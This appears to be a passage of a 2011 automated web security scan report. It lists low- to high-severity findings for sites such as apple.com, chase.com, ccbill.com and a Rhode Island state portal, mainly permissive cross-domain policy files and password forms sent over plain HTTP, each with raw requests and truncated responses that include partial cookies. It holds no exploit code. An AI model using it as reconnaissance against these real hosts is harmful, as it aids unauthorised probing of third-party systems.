HTTP/1.1 200 OK Content-Type: text/x-cross-domain Content-Length: 398 Connection: close Server: XPEHb/1.0 Accept-Ranges: none Date: Tue, 12 Jul 2011 20:40:10 GMT <?xml version="1.0" encoding="UTF-8"?> <!-- AdBrite crossdomain.xml for BritePic and BriteFlic --> <cross-domain-policy> <allow-access-from domain="*.adbrite.com" secure="true" /> <allow-access-from domain="www.adbrite.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.britepic.com" secure="true" /> ...[SNIP]... <allow-access-from domain="www.britepic.com" secure="true" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.apple.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.apple.com |
HTTP/1.0 200 OK Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT ETag: "8d-3f8918f48ef00" Server: Apache/2.2.14 (Unix) X-N: S X-Cached-Time: Mon, 21 Mar 2011 16:49:30 GMT nnCoection: close Content-Type: application/xml Content-Length: 141 Cache-Control: max-age=494 Expires: Tue, 12 Jul 2011 18:07:19 GMT Date: Tue, 12 Jul 2011 17:59:05 GMT Connection: close <cross-domain-policy> <allow-access-from domain="wdirect.apple.com" /> <allow-access-from domain="*.apple.com" /> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.youtube.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.youtube.com |
HTTP/1.0 200 OK Content-Type: text/x-cross-domain Last-Modified: Fri, 03 Jun 2011 20:25:01 GMT Date: Tue, 12 Jul 2011 20:46:29 GMT Expires: Tue, 12 Jul 2011 20:46:29 GMT Cache-Control: private, max-age=0 Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block <?xml version="1.0"?> <!-- http://www.youtube.com <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.youtube.com" /> <allow-access-from domain="s.ytimg.com" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://stats.wordpress |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: stats.wordpress.com |
HTTP/1.1 200 OK Server: nginx Date: Tue, 12 Jul 2011 20:47:00 GMT Content-Type: text/xml Connection: close Content-Length: 585 Last-Modified: Wed, 27 Apr 2011 19:01:50 GMT Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: b.scorecardresearch.com |
HTTP/1.0 200 OK Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT Content-Type: application/xml Expires: Wed, 13 Jul 2011 20:46:59 GMT Date: Tue, 12 Jul 2011 20:46:59 GMT Content-Length: 320 Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*" /> </allow-from> <grant-to> <resou ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://metrics.apple.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: metrics.apple.com |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:59:13 GMT Server: Omniture DC/2.0.0 xserver: www179 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://mtrcs.popcap.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: mtrcs.popcap.com |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 20:39:19 GMT Server: Omniture DC/2.0.0 xserver: www262 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://stats.adobe.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: stats.adobe.com |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 20:40:24 GMT Server: Omniture DC/2.0.0 xserver: www10 Content-Length: 263 Keep-Alive: timeout=15 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://stats.wordpress |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: stats.wordpress.com |
HTTP/1.1 200 OK Server: nginx Date: Tue, 12 Jul 2011 20:47:00 GMT Content-Type: text/xml Connection: close Content-Length: 309 Last-Modified: Wed, 18 May 2011 03:55:47 GMT Accept-Ranges: bytes <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> </allow-from> <grant-to> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://apps.ccbill.com |
Path: | / |
GET / HTTP/1.1 Host: apps.ccbill.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.ccbill.com Cookie: __utma=250776793 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:02:12 GMT Server: Apache X-Powered-By: PHP/5.2.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Drectory-Script: eSyndiCat Pro v2.3.02 Content-Type: text/html; charset=utf-8 Content-Length: 19391 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html dir="ltr" xmlns="http://www.w3.org ...[SNIP]... <!-- accounts box start --> <form action="http://apps <table class="no" cellpadding="2" cellspacing="0"> ...[SNIP]... <br /> <input type="password" tabindex="2" class="text" name="password" size="18" value="" /> </td> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://apps.ccbill.com |
Path: | /General-Website-Tools |
GET /General-Website-Tools Host: apps.ccbill.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://apps.ccbill.com/ Cookie: __utma=250776793 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:02:26 GMT Server: Apache X-Powered-By: PHP/5.2.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Drectory-Script: eSyndiCat Pro v2.3.02 Content-Type: text/html; charset=utf-8 Content-Length: 20399 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html dir="ltr" xmlns="http://www.w3.org ...[SNIP]... <!-- accounts box start --> <form action="http://apps <table class="no" cellpadding="2" cellspacing="0"> ...[SNIP]... <br /> <input type="password" tabindex="2" class="text" name="password" size="18" value="" /> </td> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://apps.ccbill.com |
Path: | /p/developer.html |
GET /p/developer.html HTTP/1.1 Host: apps.ccbill.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://apps.ccbill.com/ Cookie: __utma=250776793 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:03:36 GMT Server: Apache X-Powered-By: PHP/5.2.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Drectory-Script: eSyndiCat Pro v2.3.02 Content-Type: text/html; charset=utf-8 Content-Length: 25506 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html dir="ltr" xmlns="http://www.w3.org ...[SNIP]... <!-- accounts box start --> <form action="http://apps <table class="no" cellpadding="2" cellspacing="0"> ...[SNIP]... <br /> <input type="password" tabindex="2" class="text" name="password" size="18" value="" /> </td> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ucc.state.ri.us |
Path: | /loginsystem/login_form |
GET /loginsystem/login_form Host: ucc.state.ri.us Proxy-Connection: keep-alive Referer: http://ucc.state.ri.us User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDQSDTSCTB |
HTTP/1.1 200 OK Date: Wed, 13 Jul 2011 00:48:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 12492 Content-Type: text/html Expires: Tue, 12 Jul 2011 00:48:06 GMT Cache-control: no-cache <HTML> <HEAD> <Title>State of Rhode Island and Providence Plantations </title> <style type="text/css"> .label { font-family: "Courier New", Courier, monospace; font-size: 8pt; color: G ...[SNIP]... <br> <form name="Login_Form" method="post" action="CheckLogin.asp" OnSubmit="return InternetValidation(this)" <table border="0" cellpadding="4" cellspacing="0" width="100%"> ...[SNIP]... <td width="76%"> <input type="password" name="PIN" maxlength=4 size="30" onMouseOver="window onMouseOut ="window.status=''; return true;"> </td> ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://www.chase.com |
Path: | /index.jsp |
POST /index.jsp?pg_name Host: www.chase.com Connection: keep-alive Referer: https://www.chase.com/ccp Content-Length: 200 Cache-Control: max-age=0 Origin: https://www.chase.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId targeturl=https%253A%252F |
HTTP/1.1 200 OK Server: JPMC1.0 Date: Tue, 12 Jul 2011 16:27:58 GMT Content-length: 3726 Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Set-Cookie: DCTMSESSION=b3htTc2T <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > <html lang="en"> <HEAD> <TITLE> </TITLE> <script language="JavaScript"> //----------------------- ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | / |
GET / HTTP/1.1 Host: admin.ccbill.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utmz=250776793 |
HTTP/1.1 302 Found Date: Tue, 12 Jul 2011 17:14:51 GMT Location: login.cgi Content-Length: 193 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: TSc23f25=a0a841a24f7 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="login.cgi">here</a> </body></html> |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /adminBanners/blank.gif |
GET /adminBanners/blank.gif HTTP/1.1 Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:02 GMT Last-Modified: Sat, 23 Oct 2010 00:42:07 GMT ETag: "53eb57-31-4933e075355c0" Accept-Ranges: bytes Content-Length: 49 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: image/gif Set-Cookie: TSc23f25=a0a841a24f7 GIF89a................... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /ccbillLogin.css |
GET /ccbillLogin.css?2 HTTP/1.1 Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:03 GMT Last-Modified: Sat, 23 Oct 2010 00:03:54 GMT ETag: "41124b-3b31-4933d7e Accept-Ranges: bytes Content-Length: 15153 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/css Set-Cookie: TSc23f25=a0a841a24f7 html { height: 100%; } body { margin: 0px; height: 100%; width: 100%; padding: 0px; background-color:white; scrollbar-3d-light-color: scrollbar-arrow- ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /ext-2.2/adapter/ext/ext |
GET /ext-2.2/adapter/ext/ext Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:14:56 GMT Last-Modified: Fri, 09 Jan 2009 19:53:24 GMT ETag: "1680716-8c06-460121 Accept-Ranges: bytes Content-Length: 35846 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: application/x-javascript Set-Cookie: TSc23f25=a0a841a24f7 /* * Ext JS Library 2.2 * Copyright(c) 2006-2008, Ext JS, LLC. * licensing@extjs.com * * http://extjs.com/license */ Ext={version:"2.2"} ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /ext-2.2/custom/combos |
GET /ext-2.2/custom/combos Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:14:56 GMT Last-Modified: Wed, 10 Dec 2008 00:38:55 GMT ETag: "1680888-25e-45da67c Accept-Ranges: bytes Content-Length: 606 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/css Set-Cookie: TSc23f25=a0a841a24f7 /* * Ext JS Library 2.2 * Copyright(c) 2006-2008, Ext JS, LLC. * licensing@extjs.com * * http://extjs.com/license */ .search-item { font:normal 11px tahoma, arial, helvetica, sa ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /ext-2.2/custom/login.js |
GET /ext-2.2/custom/login.js Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:14:57 GMT Last-Modified: Sat, 23 Oct 2010 00:04:00 GMT ETag: "41152-20f8-4933d7f027c00 Accept-Ranges: bytes Content-Length: 8440 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/x-javascript Set-Cookie: TSc23f25=a0a841a24f7 var login; var loginType; Ext.namespace('Ext Ext.loginstore.loginType = [ ['-select one-'], ['Client'], ['Affiliate'] ]; var alertBox; var alertText ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /ext-2.2/custom/password |
GET /ext-2.2/custom/password Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:14:56 GMT Last-Modified: Sat, 23 Oct 2010 00:04:01 GMT ETag: "57f36b-2bca-4933d7f Accept-Ranges: bytes Content-Length: 11210 Keep-Alive: timeout=5, max=78 Connection: Keep-Alive Content-Type: application/x-javascript Set-Cookie: TSc23f25=a0a841a24f7 var passwordWindow; var msgWindow; var windowType = 'lost'; //default window type var accountType2; var selectedOption = 'email'; var megamenus = (window.location.href ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /ext-2.2/ext-all.js |
GET /ext-2.2/ext-all.js HTTP/1.1 Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:14:56 GMT Last-Modified: Mon, 22 Dec 2008 23:37:29 GMT ETag: "420aac-83c49-45eab2 Accept-Ranges: bytes Content-Length: 539721 Keep-Alive: timeout=5, max=86 Connection: Keep-Alive Content-Type: application/x-javascript Set-Cookie: TSc23f25=a0a841a24f7 /* * Ext JS Library 2.2 * Copyright(c) 2006-2008, Ext JS, LLC. * licensing@extjs.com * * http://extjs.com/license */ Ext.DomHelper=function() ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /ext-2.2/resources/css |
GET /ext-2.2/resources/css Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:14:57 GMT Last-Modified: Fri, 09 Jan 2009 18:46:28 GMT ETag: "5807b8-142ac-460112 Accept-Ranges: bytes Content-Length: 82604 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/css Set-Cookie: TSc23f25=a0a841a24f7 /* * Ext JS Library 2.2 * Copyright(c) 2006-2008, Ext JS, LLC. * licensing@extjs.com * * http://extjs.com/license */ html,body,div,dl,dt,dd,ul ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /ext-2.2/resources/images |
GET /ext-2.2/resources/images Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:01 GMT Last-Modified: Fri, 09 Jan 2009 18:48:12 GMT ETag: "40a3b-53d-4601132edd300" Accept-Ranges: bytes Content-Length: 1341 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: image/gif Set-Cookie: TSc23f25=a0a841a24f7 GIF89a........<t.M~%W.Hn ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /ext-2.2/resources/images |
GET /ext-2.2/resources/images Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:02 GMT Last-Modified: Fri, 09 Jan 2009 18:53:28 GMT ETag: "168094c-333-4601145 Accept-Ranges: bytes Content-Length: 819 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: image/gif Set-Cookie: TSc23f25=a0a841a24f7 GIF89a................... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /ext-2.2/resources/images |
GET /ext-2.2/resources/images Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:02 GMT Last-Modified: Fri, 09 Jan 2009 18:53:28 GMT ETag: "409a3-718-4601145c39a00" Accept-Ranges: bytes Content-Length: 1816 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: image/gif Set-Cookie: TSc23f25=a0a841a24f7 GIF89af......1P.3Q.2R.3R ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /ext-2.2/resources/images |
GET /ext-2.2/resources/images Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=37461042 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:22:18 GMT Last-Modified: Fri, 09 Jan 2009 18:47:45 GMT ETag: "420e24-76-460113151d640" Accept-Ranges: bytes Content-Length: 118 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: image/png Set-Cookie: TSc23f25=d8effb4a9a9 .PNG . ...IHDR..............o&.... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /ext-2.2/resources/images |
GET /ext-2.2/resources/images Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=37461042 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:22:18 GMT Last-Modified: Fri, 09 Jan 2009 18:47:45 GMT ETag: "5808aa-87-460113151d640" Accept-Ranges: bytes Content-Length: 135 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: image/png Set-Cookie: TSc23f25=d8effb4a9a9 .PNG . ...IHDR................... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /ext-2.2/resources/images |
GET /ext-2.2/resources/images Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=37461042 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:22:18 GMT Last-Modified: Fri, 09 Jan 2009 18:47:45 GMT ETag: "16809de-137-4601131 Accept-Ranges: bytes Content-Length: 311 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: image/png Set-Cookie: TSc23f25=d8effb4a9a9 .PNG . ...IHDR.......0.....2...... ...^..#a.&...C..H.s. ....#&C... 1.R...D...."!caJ..)..3!S. ..!v.H....EE.x.X..,4.5.Bh.. ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 Host: admin.ccbill.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:17 GMT Last-Modified: Thu, 28 Jun 2007 17:58:59 GMT ETag: "c9e92-1-433fb1df13ec0" Accept-Ranges: bytes Content-Length: 1 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/plain; charset=ISO-8859-1 Set-Cookie: TSc23f25=a0a841a24f7 |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /images/ccb_Affiliat |
GET /images/ccb_Affiliat Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:07 GMT Last-Modified: Wed, 01 Sep 2010 22:27:40 GMT ETag: "3070d-d48-48f3a34968f00" Accept-Ranges: bytes Content-Length: 3400 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: image/gif Set-Cookie: TSc23f25=a0a841a24f7 GIF89al.Q..........\{.... ..............z.......... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /images/ccb_Affiliat |
GET /images/ccb_Affiliat Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
